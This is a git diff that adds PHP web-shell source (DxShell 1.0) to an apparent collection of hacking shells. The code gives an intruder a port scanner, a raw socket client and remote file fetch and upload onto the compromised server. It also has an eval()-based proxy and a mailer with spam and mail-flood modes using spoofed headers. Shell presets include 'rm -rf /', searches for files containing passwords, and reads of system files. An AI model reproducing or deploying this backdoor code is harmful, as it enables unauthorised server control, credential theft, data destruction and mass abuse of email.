Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))		{		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{	if (!isset($_GET['dxparam']))
+		{
+		print '';		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/xakep-shells/PHP/DxShell.php.php.txt b/xakep-shells/PHP/DxShell.php.php.txt
new file mode 100644
index 0000000..ae829e5
--- /dev/null
+++ b/xakep-shells/PHP/DxShell.php.php.txt
@@ -0,0 +1,2031 @@
+<?php
+$GLOB['SHELL']['USER']['Login']='';
+$GLOB['SHELL']['USER']['Passw']=''; /* pwd. "as is", or md5() possible */
+
+/*
+  DDDDD        SSSSS    DxShell    by î_Î Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ# 1227-700
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{
	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;
print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
